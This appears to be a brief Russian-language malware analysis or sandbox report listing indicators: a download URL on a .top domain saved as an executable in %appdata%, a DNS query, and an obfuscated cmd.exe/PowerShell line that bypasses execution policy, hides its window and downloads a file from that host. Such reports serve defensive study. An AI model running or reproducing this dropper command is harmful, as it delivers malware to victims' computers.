Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^o^W^eRsheLl.^e^XE -EX^eCutIOnp^O^LiCY BYpAs^s ^-NO^p^ro^Fi^lE -wiNd^oW^s^T^YLe hid^d^En (^n^eW-obJECt ^s^y^S^t^eM^.nET^.wE^b^ClIE^Nt).D^O^wn^LOaD^F^il^E('http://www.doorasope...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "P^o^W^eRsheLl.^e^XE -EX^eCutIOnp^O^LiCY BYpAs^s ^-NO^p^ro^Fi^lE -wiNd^oW^s^T^YLe hid^d^En (^n^eW-obJECt ^s^y^S^t^eM^.nET^.wE^b^ClIE^Nt).D^O^wn^LOaD^F^il^E('http://www.doorasope...' (со скрытым окном)